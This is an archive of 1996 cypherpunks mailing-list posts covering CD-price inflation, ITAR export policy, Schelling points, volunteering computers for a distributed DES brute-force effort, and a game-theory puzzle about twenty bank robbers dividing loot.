Content-Type: text/plain


At 6:18 PM 7/25/96, jim bell wrote:

>If what Duncan said were true, then you'd see music stores spring up which
>sell ONLY the "Top-40 stock", but sell it for pre-CD vinyl prices.  They'd
>get all that business, and OTHER record stores would sell the obscure stuff.
> That's not happening.

Something not being talked about in any of the messages I've seen is the
role of _inflation_. Those claiming CD prices are "too high" should
consider inflation.

(Caveat: I also consider CD prices "too high," in terms of what I'd _like_
to pay.)

When I first started buying LPs, circa 1967, LP prices were usually around
$4.88 (that figure rings a bell, no pun intended). Some discount prices
were around $3.67, at a local PX (Post Exchange, a military store, usually
having subsidized prices). I do recall paying $5.98 for some albums I
wanted.

And in those days the average working man's salary was under $10,000 a
year, gold was $35-40 an ounce, a new 3-bedroom house in many areas cost
$20-30K, a pound of hamburger cost less than a dollar, a copy of
"Scientific American" cost either 60 or 75 cents (price increased) and a
paperback book cost between 75 cents and $1.25.

(These numbers are approximate, but mostly about right. Paperback books,
for example, were at about 35 cents until the 60s, then moved to 50 cents,
then to 60-75 cents, then hit the dollar point around 1970, the $1.95 point
a few years later, then jumped to $2.95, $3.95, etc., and are now around
$5.95 for most bestseller paperbacks. Again, don't quibble too much. A
detailed check of paperback collections showing publishing dates and prices
would pin these numbers down.)

So, what do we have now? Salaries are 2-4x higher, gold is at $375 an
ounce, a new 3-br house averages about $100K (and is 2x that in many
places), hamburger is at $2-3/pound, "Scietific American" sells for $3.95
or $4.95, and paperback books go for $4.95.

Roughly, then, everything on this list is 3-4 times more expensive than it
was in the late 60s. So, those LPs I was buying for $4-5  should now cost
$12-20, correcting for inflation/price rises.

And yet I am able to find many CDs I want for $8.67 (Tower Records: "3 for
$25" sales). And they never wear out. And they usually have 60 minutes or
more music on them--at least the CDs I buy do--, compared to the paltry
35-40 minutes on most LPs of the past.

I can also make flawless copies of CDs I borrow onto DATs. (A friend of
mine has gone a bit far with this, borrowing thousands of CDs from
libraries...he now has 3900 CDs recorded digitally.)

So, while I "wish" CD prices were even lower, I'm paying a lot less in
"real dollars" for more music today than I was paying 15 years ago or 30
years ago.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 06:58:09 +0800
To: cypherpunks@toad.com
Subject: Industry and Government "Guidelines" (Is Speech Next?)
Message-ID: <ae1d196e130210048937@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:15 PM 7/25/96, The Deviant wrote:
...
>> Then, they added ITAR.  And they want us to obey it.
>>
>> Finally, it seems, they're giving us "guidelines."  Not law, Not ITAR.
>>
>> Next it's gonna be their their fondest desires, their preferences,and
>> finally their whims.

I was going to reply, but I have decided to follow the "speech guidelines"
suggested by my local MiniTru authority figure. While the government does
not demand that my words be cleared by them, they have made it clear that
if I sign a "Good Citizen Pledge," and agree not to speak of certain
things, that my problems with the government will be lessened, my export
requests expedited, and my passage through Customs will be eased.

--Tim May

Seriously, I think there are serious "rule of law" issues arising out of
these "consultations" between industry and government. Things are not
spelled out, as Mindy Cohn of the Bernstein case so articulately has
described, and people seeking clearcut decisions about what can and can't
be exported find they get no answers. "We can't define an illegal export,
but we know it if we see it."

And actually not even this, as the decision often takes months or longer,
or no response is ever received. (Was the ITAR violation t-shirt ever given
a CJR or turned down for one? Though my personal view is that the t-shirt
was a side issue, and a frivolous example, last I heard State was simply
not responding one way or another.)

Seems to me, and I'm sure to others, that the ITARs are a clear case of
what lawyers call "overvagueness."

And my joke about a "Good Citizen Pledge" is only partly a joke. The
language of companies "coming to agreements" with the State Department, in
exchange for expedited handling, is a dangerous trend. Carried further, it
could create classes of companies and citizens, not all of whom would be
treated equally under the law.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 07:55:29 +0800
To: janke@unixg.ubc.ca
Subject: Re: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <ae1d1c9414021004469a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:28 PM 7/25/96, janke@unixg.ubc.ca wrote:
>Hello, Tim,
>
>I found your essay interesting, but would like to describe a
>hypothetical situation and my ideas of how your notion of Schelling
>points applies to you to see if I am correctly following your ideas:
>
>Suppose that I live in a rural area and
>I know that my neighbour beats his children because I have seen them with
>bruises before and too many times just to be from household accidents.
>Since I am far enough away from him, the beating does not make enough noise
>to distrub me from any of my activities. I am also planning on
>moving in three years, so there is little danger that I will be a
>victim if the children develop into violent criminals due, in part,
>to their abuse. In this case, the "least action" reasoning seems to
>tell me to do nothing.

I mentioned "beatings" as a specific example of where the community may
decide the costs of intervention are justified. In my view, concentrating
on such "extreme" cases (beatings, Christian Scientist parents, etc.) is
rarely useful, especially when most "interventions" are for so much less
extreme cases.

>On the other hand, the state might do some sort of calculation like
>the following:
>
>(probability the children will become violent criminals) x
>(cost of dealing with violent criminals)
>-(cost of taking the children from the parent)

Well, I don't believe any calculus of "probability the children will become
violent criminals" is useful. We don't know if watching the Power Rangers
will make an 8-year-old "turn into" a criminal at age 18. And so forth.


>Am I following your ideas ok? :)
>

Check out the Friedman URL I gave for more details. The Schelling point
view is more "energy conservation common sense" than utilitarian models
usually have it.

Thus, all of your talk about estimating the chances that someone will
become a criminal in the distant future is not something an "energy
conserver" (a lazy person, basically) will worry about too much.
Especially, but not solely, because there is basically no way to predict
the future.

I might think that my neighbor, a Christian Fundamentalist, is raising
warped kids. But this is his business, so long as I have don't have to pay
for them or their ideas directly. They may turn out to be Dahmerian
cannibals in 10 years, but they probably won't. And, in any case, I won't
lift a finger to change their home environment. (Nor would my neighbor
tolerate it--and he's got a Benelli Super-90 Tactical Shotgun, a lot more
firepower than I have!)

This last paragraph is pretty important. A lot of people realize they can't
personally intervene with their neighbors, and so they seek the power of a
mob or herd to enforce some law they themselves cannot or will not. "There
ought to be a law!" is the most disgusting phrase in the English language.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phillip <root@adam.sp.org>
Date: Fri, 26 Jul 1996 18:43:16 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Brute-forcing DES
In-Reply-To: <Pine.LNX.3.94.960724054322.1558A-100000@switch.sp.org>
Message-ID: <Pine.LNX.3.94.960726054437.566A-100000@adam.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: 2.6.2

owGtkVtIFFEYxzWxcFpEC+kG8iWoRM4ublctyygjszTRstpsOc18uzvteM465+yO
G3SDiOwC2U17EMJuD6EgERoEBZFF5otUdDGEHiIrMqIoJauz6ksR0UMf52G+OfP9
/v//N/XxaQmJcblfPU2OjbPttoJ1BfHxSCeNpNa29tWmTfx29VVXY/PWG5VZex1Z
avK+896Ly5V7nxoLTwwnOA7aL+oPv542OI+eGjQyk8tXD1z/MuzIf3f3vnJyanxK
5ftS/6Gjb0rYJvfEjQVPHx+LVP0o29NeviXzx/yh0z0p0/JOdF9tSI7cvrO0Oevt
g9Sd5XO/Bs/0rstMAdcIJhQ/HrjSfniwN30Cv55b3DO8/aWx29u97+P5pmO84cK9
iraO/uxFru/Luj8od0u+9TnPJh6Z2Tq96BG0b05vm2F2DRb2X96f0dlCk+eUed+d
q34WfeJSUjtvjUQP2J+vjby/2Z92aUFieuNQkZpAV9Z3TH045czzrobJ21qOdziG
Wid82ZHIhW7QOFllFKpQzwH3fFgbNiE3L29hDlQGEFZhxCBUgG0xgfmK4qkoLd5Q
rSwDeaoQiMkZUEQdBAOi6xZyDkLO1YaRC4NRYL7RXmM6giE4mj4nSA0uQLOiIWFQ
v3wtYTaj2VKGWUF5L8mjUAJ+xnSwSTTGFxIJXvnAUbJ8YCMESESaoPJwGy1vDviY
JWEEKKNqkDKbQsgkBhVYJ4AIQbSgU1kfhTDV0eKCUD1mYNzjqqIKGciPliG7GvDw
EKgg8/EwQg1CNRixbERIw+CtKivNrvQqMcMSLOdMsF1slGMZ/oCAIEadY3sCVR1f
Y2xpEoARtIBpWtji4LNYDZhMxpB0YsqoHHZglFF9LLu0CHLYjLGSklQVVlsG6pah
BaDUQLGLawEck5nlcS9YkrtmlqdEUdT/XErGCrCIbjCiCUN61WTkAOGAsaiIVDam
TzXlFXdmwF/14df6F/HQTrfbnbe4sK7OSTTuJKGQ/HUCnaiHf6MFhAjlu1x/+NC1
Z5yi/AQ=
=qi1D
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 26 Jul 1996 18:50:01 +0800
To: Marshall Clow <mclow@owl.csusm.edu>
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <v03007800ae1d6b7e4141@[207.67.246.99]>
Message-ID: <Pine.BSF.3.91.960725220641.299A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 25 Jul 1996, Marshall Clow wrote:

> >Here's a puzzle for our game theorists.
> >
> >Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> >how they plan to split the money: they stay in line, and the first guy
> >suggests how to split the money. Then they vote on his suggestion. If
> >50% or more vote for his proposal, his suggestion is adopted.
> >
> >Otherwise they kill the  first robber and now it is the turn of guy #2
> >to make another splitting proposal. Same voting rules apply.
> >
> >The question is, what will be the outcome? How will they split the
> >money, how many robbers will be dead, and so on?
> >
> It seems to me that the last two guys in line will _almost always_ vote for killing the suggestor.
> 
> the exceptions being for extreme suggestions like "let's split the money between #19 and #20", which I figure will get voted down by #s 2 thru 18.

Starting at the end, and working to the beginning:

If only 19 and 20 are left, 19 has 50% of the vote, and can take all. #20 
loses out.

Therefore, with 18,19, and 20 left, 20 will take whatever 18 offers, as 
it is better than getting nothing.

With 17,18,19,20 left, 17 should propose a split with 20, who will likely 
get a smaller cut from 18, because of the above.

With 16, 17, 18, 19, 20, three votes are needed, reducing the take for 
the majority, so no one other than #16 is acting in their best interest 
to approve a split, except for #19 trying to avoid losing out to 17/20 in 
the next round. Not enough for a majority.

Follow this forward, and find that any even numbered cypherpunk on 
Ritalin with UZI bankrobber is useless, as an additional person is needed 
to form the 50%-or-better as compared to the next round.

All even-numbered cypherpunks should then expect a short life expectancy. 
(You are number 6; who is number 1?)

Therefore, punk #2 should propose that the money be split equally between 
all even-numbered / disadvantaged punks, as they will otherwise all get 
bumped off by odd punks. The odd punks, of course, get nothing in #2's 
proposal.

Taking this one step further, and assuming that all clever punks have 
realized this, punk #1 proposes that the evens will perform the above 
split, if #2 is allowed to advancve this proposal, and therefore the only 
profitable option open to odd punks is to spilt the money between 
themselves, giving the even punks nothing.

Of course, if one of the punks is our recently arrived ^h^h^h^h
(just remembered I'd taken the pledge ...)  ;)

Rabid Wombat
Nocturnal Diseased Marsupial

The moral of this story is that it is good to be an odd punk ...

> 
> -- Marshall
> 
> Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>
> 
> "We're not gonna take it/Never did and never will
> We're not gonna take it/Gonna break it, gonna shake it,
> let's forget it better still" -- The Who, "Tommy"
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phillip <root@adam.sp.org>
Date: Fri, 26 Jul 1996 18:55:13 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Brute-forcing DES
In-Reply-To: <Pine.LNX.3.94.960724075327.1558D-100000@switch.sp.org>
Message-ID: <Pine.LNX.3.94.960726060122.566B-100000@adam.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 24 Jul 1996, The Deviant wrote:

> On Tue, 23 Jul 1996 pjn@nworks.com wrote:
> 
> > Date: Tue, 23 Jul 1996 16:25:44 -0500
> > From: pjn@nworks.com
> > To: cypherpunks@toad.com
> > Subject: Brute-forcing DES
> >
> >  > Any one up for a distributed brute force attack on single DES? My
> >  > back-of-the-envelope calculations and guesstimates put this on the
> >  > hairy edge of doability (the critical factor is how many machines can
> >  > be recruited - a non-trivial cash prize would help).
> >
> >  >> Count me in. I've got a couple of net-connected Pentiums that are
> >  >> mostly idle.
> >
> >     Although I dont have a pentium, I would be glad to put forth
> >     some computer power to help.
> >
> >  >> Might be able to bring some money in by selling "I Helped Crack DES
> >  >> And  All I Got Was This Lousy T-shirt" T-shirts.
> >
> >     Id buy one! :)
> >
> 
> Actually... we might as well print up the t-shirts, and sell them for $15
> apeice, then buy a DES cracker with the profit ;)
> 
> Seriously though, I'd by the t-shirt, and I'll donate processor time.  I
> can definatly give an 8086 (BALK) to the process, some time on a 80386,
> and a limited amount of time on some p75's...
> 
>  --Deviant
> Whatever occurs from love is always beyond good and evil.
> 		-- Friedrich Nietzsche
> 
> [25;1H[K

I'd get a about 7 t-shirts too ;)  and I coud probably donate at least 1 80386,
xx% of a 80386, a LITTLE bit of a DEC Alpha or so, probably 1 or 2 808x's and
mayby a 80486, and 2 (if someone ports the code)  C64's! (Wouldn't it be funnie
if thay were the lucky cpu's ?[headlines: DES broken by C64])...  
How much for {2,4}000000/sec? $60? I buy $600 worth of parts. :) 

- --------------------------------------------------------------------------------
A cynic is a person searching for an honest man, with a stolen
lantern.
                -- Edgar A. Shoaff

- ---------------------------               -----------------------------------
pj22298@xx.acs.appstate.edu               http://xx.acs.appstate.edu/~pj22298

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfhgZQxVIXeuPUw9AQFUXwf+ONoCj3ocIiAPA3OtQXP6tA/X+XN9dOoR
E0doGjt0otmGueNHxIu/7SrtqODDvhUkIS0x5zcNf9Krj3M7nhH/75proNHms/ra
jGfR4vHhMVkIAQ8jETJ++GefOMIUPmPBpuDoAIy8rUofY2qi4+fC5TiUBsWoFibb
uSO4mesfTObOMQps+WT8e7jg36ugWZPNATYUIzMa6k5EfUrCy98Zt0AtirJMk0Mv
c2qMdjlvkCBj6lfKzITqMLiLkD5EKXHVOmcu9CDkzni/mWlQvx1N+5VdyCN0gc8X
8BcmJPFDUHVAWF7utx3ROpvsuqXpzpbbbtzOoDHKYK01n7W+cbGDhw==
=gKYI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 26 Jul 1996 17:58:24 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <Pine.SUN.3.91.960725180951.8320A-100000@crl7.crl.com>
Message-ID: <Pine.BSF.3.91.960726061034.1201F-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 25 Jul 1996, Jerome Tan wrote:
> 
> > Does anyone know how to produce a 7 hertz frequency?
> 
> No, but hum a few bars and we'll fake it.
> 

I am.

7 hertz is sub-audible. 

:)

> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phillip <root@adam.sp.org>
Date: Fri, 26 Jul 1996 17:59:38 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
In-Reply-To: <199607242028.NAA20103@well.com>
Message-ID: <Pine.LNX.3.94.960726062530.566D-100000@adam.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Has anyone thought of asking RSA, etc, for help? If DES falls (so to speak) it
yould make thare product more desirable.

- --------------------------------------------------------------------------------
Death come but once in a lifetime.
- ---------------------------               -----------------------------------
pj22298@xx.acs.appstate.edu               http://xx.acs.appstate.edu/~pj22298

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfhlOQxVIXeuPUw9AQEY6gf+MTSvOvj8tZQchTepFPkcNl0DoQOE6BrV
Lps7VavbNrB+IJsTalpYUDOaqKk85KfWPjx8aDNmQ6sVAm/oqfc18SMqTak4A8gy
7U44/o3IPWWKY/FOqE3Q/9Nv5+hjv1OSVRE7sRWEf6Q8t+/RYz8GcTT19F5FDRJF
MwralsFzvDdBCZCI6fLdL5a3TKufnqt90y6hZWlAssYtTG0VMWl+AXVw52mIpOru
tI+utLOJD7mYMza+8C1m2NVrx7krYAFXTB4Qzr5UwaSWYF7aVwddiKNLHvYalihO
4siYxOAIl543rhS3gHDUrNeEsDov/OiaL9XVYuF7+tyyPT+Ej+oRSA==
=F9z3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phillip <root@adam.sp.org>
Date: Fri, 26 Jul 1996 19:51:48 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Cracking DES or building a DES cracking machine?
In-Reply-To: <199607240124.UAA12269@manifold.algebra.com>
Message-ID: <Pine.LNX.3.94.960726063118.566E-100000@adam.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 23 Jul 1996, Igor Chudov @ home wrote:

> Hm,
> 
> If we are talking about convincing 100,000 people to donate a lot 
> of their CPU time, would not it be possible to convince the same
> 100,000 people to donate $10 each and build a $1,000,000 DES cracking
> machine?
> 
> Then we can crack DES keys for a certain sum per key, without asking
> any unnecessary questions. Profits can be donated to purchasing AK-47's
> for poor preschool children or some similar charitable project.
> 
> 	- Igor.
> 
> 

Yea, but how keep the machine? How pays for power? etc...
By spliting up over this type of network we defente several things:
	Utilities/Facilities - power, heating/cooling.
	Taxes - We neither create an orginzation nor profit,
	Porfit - Thars' none, so no one complains.
	
And we [MIGHT] save the time to have such a thing built.
[ But if we do make the machine, I Wan't it when we're done]
- --------------------------------------------------------------------------------
- ---
Losing intrest?  Try a new bank.
- ---------------------------               -----------------------------------
pj22298@xx.acs.appstate.edu               http://xx.acs.appstate.edu/~pj22298

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfhnJwxVIXeuPUw9AQFYPQf/StKZCEAybMCC4iuMgYtpwYX1NJ9Bv+F0
ZGCi5uZ5lvW/SHr83LseRHT80Wf0ynKZc/fVlgmp7xe56sNxubsf+0swz1noBTZp
umZNOFLYQBp4eJ9+M8KHadx7mx5nDGtWjcbmCh4r8SDv0n5aM21eDNvtsLwt9xfW
nE9G1DBf8NrJO/sMQFULCJP5i+LFvsv71kVB4Xw/Y4seQoOrZWDvSDxRDQSqen+U
VmOmpmY3D1reyDl8StQ5kuQoXzsaT+TtEG5dWHH23FLZE/SE7GoMsTDAodpTq8ET
Q01hnQpSAQp3WOwhzXXbOO2ON2sP7MKqVj+HAsJ1us9SSEHy9CqTRg==
=5OcK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 27 Jul 1996 00:56:20 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607251813.NAA02650@galaxy.galstar.com>
Message-ID: <199607261359.GAA05920@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


First, the line is established before the proposals begin.  So the
proposer is not determined by lot, everyone knows who will be #1, #2,
etc.  Second, I think the proposer gets to vote.  The wording is a bit
ambiguous, but it just says that "they" vote, and I think "they" pretty
clearly refers to the whole group.

Now here is the solution for two people:

#1 (first in line) proposes that he gets it all.  #1 votes yes, #2 votes
no.  The proposal passes.

Here it is for three people:

#1 (first in line) proposes that he gets it all.  #1 votes yes, #2
probably votes no (since he will get it all if the proposal fails, by
the above) and #3 (end of line) reasons like this: if the proposal
fails, he (#3) will get nothing because #2 will get it all.  Therefore
voting yes or no makes no difference to whether #3 stays alive (his
first priority) or how much money he makes (his second priority).  But
it does make a difference in terms of keeping as many people alive as
possible (his third priority).  So he votes yes because of this third
reason.  Therefore the proposal passes and the first person in line
gets it all in this case.

Of course, #1 could have offered some money to #3 and gotten his vote,
but that would violate the terms of the problem: #1 wants to make as
much money as possible.  And since he can get #3's vote even while
offering nothing to him, that is what he will do.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 26 Jul 1996 22:13:03 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <2.2.32.19960725225533.0070ca20@mail.sd.cybernex.net>
Message-ID: <199607261119.HAA12437@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Erle Greer writes:

: At 09:09 AM 7/25/96 -0500, you wrote:
: >Here's a puzzle for our game theorists.
: >
: >Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
: >how they plan to split the money: they stay in line, and the first guy
: >suggests how to split the money. Then they vote on his suggestion. If
: >50% or more vote for his proposal, his suggestion is adopted.
: >
: >Otherwise they kill the  first robber and now it is the turn of guy #2
: >to make another splitting proposal. Same voting rules apply.
: >
: >The question is, what will be the outcome? How will they split the
: >money, how many robbers will be dead, and so on?
: >
: >igor
: >
: 
: Here's my guess:
: Eache robber is going to want the largest share of the money possible.
: Therefore The first guy dies automatically because that increases the share
: size.  This continues on until there are only two robbers left.  Robber #19
: suggests that he receives the full 20 million and since his vote is 50%, he
: receives it all.  18 robbers dead.

That ``solution'' assumes that cypherpunks are rather stupid.  Since
everyone can do that calculation it is quite clear that at least 18
would refuse to vote (or fail to vote) in a way that produces such a
result.  On the other hand, a proposal by the first guy to split the
proceeds equally among the first ten should be satisfactory to the first
ten.  On that basis nobody dies and ten receive two million each, if we
assume that each is a simple profit maximizer.

I think that that result is stable, but am not going to try to prove
that it is.  (If the result is not stable, it should be relatively easy
to establish that fact.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Fri, 26 Jul 1996 23:59:58 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <9607261146.AA09833@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain



>> Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>> how they plan to split the money: they stay in line, and the first guy
>> suggests how to split the money. Then they vote on his suggestion. If
>> 50% or more vote for his proposal, his suggestion is adopted.
>> Otherwise they kill the  first robber and now it is the turn of guy #2
>> to make another splitting proposal. Same voting rules apply.

Perhaps I'm missing something, but it seems to me that first person in 
line (#1) would say propose that the first 11 people in line each receive 
a split of 1/11 of the 20 million and that since this doesn't come out 
exactly even, that he (#1) would make up the few cents difference out of 
his share (a small price to pay to keep alive).

This would probably get the votes of the first 11 people.  
Results:
o First 11 people split the money (last 9 get zip)
o All live.

Best Regards,


Frank
Any sufficiently advanced bug is indistinguishable from a feature.
	-- Rich Kulawiec

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Information Security Consulting 
http://www.fortified.com     Phone: (317) 573-0800     FAX: (317) 573-0817     
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 26 Jul 1996 23:28:46 +0800
To: cypherpunks@toad.com
Subject: [FUNNY] Rich Graves exposed
Message-ID: <XcaoRD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I didn't realize Rich is a neo-Nazi revisionist. :-)

Path: ...!bloom-beacon.mit.edu!news.mathworks.com!tank.news.pipex.net!pipex!oleane!jussieu.fr!math.ohio-state.edu!uwm.edu!news.nap.net!news.pyrotechnics.com!kiwi.pyrotechnics.com!scallon
From: scallon@pyrotechnics.com (Brendan J. F. Scallon)
Newsgroups: can.politics,alt.revisionism,soc.culture.jewish,alt.personals.intercultural,soc.couples.intercultural,alt.fan.ernst-zundel,alt.censorship,news.groups
Subject: Re: Ken McVay and Rich Graves support censorship
Followup-To: can.politics,alt.revisionism,soc.culture.jewish,alt.personals.intercultural,soc.couples.intercultural,alt.fan.ernst-zundel,alt.censorship,news.groups
Date: 26 Jul 1996 03:41:43 GMT
Organization: George Clinton/Bootsy Collins '96
Lines: 14
Message-ID: <4t9epn$972@news.pyrotechnics.com>
References: <4s5b5c$1s5@tor-nn1-hb0.netcom.ca> <alain-2007961547510001@maximon.e-sense.net> <4ss1co$eq@Networking.Stanford.EDU> <slepokuo-2708561335090001@agta173.cadvision.com> <4ssifd$1b2@Networking.Stanford.EDU> <005304Z22071996@anon.penet.fi> <4sun4t$rln@news1.panix.com> <093312Z22071996@anon.penet.fi>
NNTP-Posting-Host: kiwi.pyrotechnics.com
X-Newsreader: TIN [version 1.2 PL2]

For those of you who do not understand:

Kenneth McVay started the Nizkor Project after he stumbled across Dan
Gannon's revisionist BBS (denies the Holocaust).  His Nizkor Project
had millions of byltes of data about the Holocaust and info about the
revisionists (i.e. Gannon, Les Greaseball, Rich Graves, Kevin Alfred
Strom, etc.); He was awarded the Order of British Columbia for his
work.

--
Brendan John Francis Scallon    When it comes to the net, I'm
scallon@pyrotechnics.com     similar to the thrilla in Manila
Race: Other__Celtic__    http://www.pyrotechnics.com/~scallon
CLINTON/COLLINS '96           This country needs a Parliament




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Fri, 26 Jul 1996 23:25:08 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Silliness on cypherpunks
Message-ID: <AE1E3145-4A32A0@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain



While I don't intend to try to impose my views on what cypherpunks should
discuss, I would like to inject some comments on some recent trends that I
throw into the "silliness" category.  

The first issue is the seemingly sincere attempts at answering questions
that are obviously irrelevant.  IMO cypherpunks are not "Mr. Answer Man"
for every question someone has regarding computers or electrical
engineering.  Sure, most of us are pretty capable of answering these
questions - that doesn't mean that we should.  Whenever I asked a silly
question at home, my dad used to tell me - "look it up".  The process of
finding the answer was actually far more important than the answer itself. 
We should attempt to ignore these kinds of questions.  Maybe eventually
they will go away.

My other "peeve of the day" is the wonderful introduction of the "mee too"
postings to cypherpunks.  I know it makes you feel really great to donate
your old TRS-80 to the cause of brute-forcing DES, but honestly, most of us
don't share your joy.  Nuff said.

For the record, I appreciate good humor (I get a real kick out of the
"Cypherpunk Enquirer").  I think humor absolutely has a place on this list,
I just differentiate humor from some of the "silliness" trends I noted
above.

	Clay  

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 27 Jul 1996 03:17:13 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fireworks expected, missed at Senate crypto hearing
In-Reply-To: <199607260744.AAA23283@mail.pacifier.com>
Message-ID: <Pine.3.89.9607260859.A20884-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jul 1996, jim bell wrote:

> >Just more of the same, though we heard less about child pornographers and
> >more about terrorists. And Sen. Slate Gorton (R-Wash) jumped on the
> >committee staff for leaning too far *away* from national security interests
> >in their summary of the legislation.
> 
> What does that mean?  As opposed to what?  (Gorton's my Senator, and I'm 
> going to give a little feedback to his local office...)

He criticized the committee staff for not preparing a balanced summary. 
Harsh words, from a Repub.

If his comments yesterday are indicia, he won't vote for Pro-CODE. 

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 27 Jul 1996 01:00:13 +0800
To: gary@systemics.com (Gary Howland)
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <31F89692.167EB0E7@systemics.com>
Message-ID: <199607261346.IAA02877@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Gary Howland wrote:
> 
> David Sternlight wrote:
> > 
> > >>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
